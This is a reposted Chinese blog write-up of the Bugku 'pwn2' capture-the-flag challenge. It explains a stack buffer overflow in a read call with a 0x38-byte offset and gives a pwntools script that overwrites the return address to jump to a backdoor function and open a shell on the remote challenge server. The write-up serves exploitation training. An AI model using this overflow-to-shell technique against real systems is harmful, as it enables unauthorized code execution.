码迷,mamicode.com
首页 > 其他好文 > 详细

bugke pwn2

时间:2019-06-06 00:05:59      阅读:113      评论:0      收藏:0      [点我收藏+]

标签:ESS   elf   存在   symbol   覆盖   from   get   直接   ida   

技术图片

根据伪代码可以看到read函数存在溢出

技术图片

存在一个后面 那就直接覆盖返回地址就完事了

从ida很直观看出s的偏移为0x30

所以到到返回地址的距离就是0x30+0x8

 

from pwn import *
#p = process(‘./pwn2‘)
p=remote(‘114.116.54.89‘,‘10003‘)
elf = ELF(‘./pwn2‘)
flag = elf.symbols[‘get_shell_‘]
payload = ‘a‘*(0x8+0x30)+p64(flag)
p.recvline()
p.sendline(payload)
p.interactive()

bugke pwn2

标签:ESS   elf   存在   symbol   覆盖   from   get   直接   ida   

原文地址:https://www.cnblogs.com/haozhizhi/p/10982400.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!